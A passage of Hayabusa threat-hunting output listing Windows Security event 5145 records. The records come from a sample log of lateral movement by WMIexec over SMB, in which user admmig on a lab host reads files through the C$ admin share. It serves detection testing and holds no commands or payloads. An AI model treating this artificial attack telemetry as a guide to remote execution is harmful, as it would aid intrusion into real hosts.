Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 
